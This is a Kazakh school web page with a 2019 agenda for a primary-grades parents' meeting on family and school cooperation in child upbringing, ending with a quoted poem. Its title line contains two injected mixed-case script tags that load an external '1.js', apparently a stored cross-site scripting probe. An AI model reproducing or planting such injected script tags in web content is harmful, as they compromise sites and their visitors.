Тәрбие мен білім егіз<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.02.2019

Ғ.Әбдірахманұлы атындағы Қима орта мектебінің бастауыш сынып оқушыларының ( 1, 2, 3, 4 сыныптар) ата-аналарының жиналысын өткізу тәртібі

Тақырыбы:  «Тәрбие мен білім егіз»

Күн тәртібінде:

1. Баяндама: «Бала тәрбиесіндегі жетістік –мектеп пен отбасы ынтымақтастығында»

Баяндамашы: бастауыш сынып мұғалімі: Балатаева Елена Эдуардовна

2. Тақырып бойынша ата-аналарға топтық тапсырма ұсыну:

1-ші топтың тапсырмасы: «Бала тәрбиесі үшін отбасы жауапкершілігі басым ба,әлде мектептің жауапкершілігі басым ба?»

2-ші топтың тапсырмасы: «Баланың атасы мен әжесінің тәрбиесінде,атасы мен әжесінің баласы болуына қалай қарайсыздар?»

3-ші топтың тапсырмасы: «Баланы еркін тәрбиелеген дұрыс па,қатаң тәрбиелеген дұрыс па?»

4-ші топтың тапсырмасы: .«Баланың өскенде жақсы,өнегелі адам болып шығуына отбасынан алған тәрбиенің ықпалы зор» дегенге өз пікіріңіз,көзқарасыңыз қандай?

 

3.Тренинг: Гүл күлтешелеріне шынайы тілек –лебіздерін жазып, топтармен алмастыру (топтар бір-біріне)

4. Бейнежазба: «Ұлт болам десең ұл- қызыңды тәрбиеле»

 

5. Рефлексия. Кері байланыс: Стикерлерге ата- аналар тілектер мен ұсыныстар жазу.

 

6. Мұғалімнің қорытынды сөзі:

Ата - ананың бақыты баланың дұрыс адам болып өсуіне байланысты. Ал балалардың өздеріңізге бақыт сыйлайтын тұлға болып қалыптасуы, ата - аналар сіздерге байланысты дей отырып:

«Қатты тәртіп көрсе бала күнінде,

Өнерімен қуантады түбінде.

Бала нені білсе жастан, ұядан -

Өле - өлгенше соны таныр қиядан

Өнер - білім берем десең басынан,

Бер оқуға балаларды жасынан.

Ата - анадан өсіп ұрпақ тараған

Жақсы - жаман болса бала солардан»,-деген Жүсіп Баласағұнның сөзімен жиналысымызды аяқтаймыз.

Уақыт бөліп келгендеріңізге көп рахмет, сау болыңыздар!

Қошемет, қол соғайық!

 

Аширханова Б.К.

Просмотров: 942


Пікір қосу



Деректерді қолтаңбаға қосу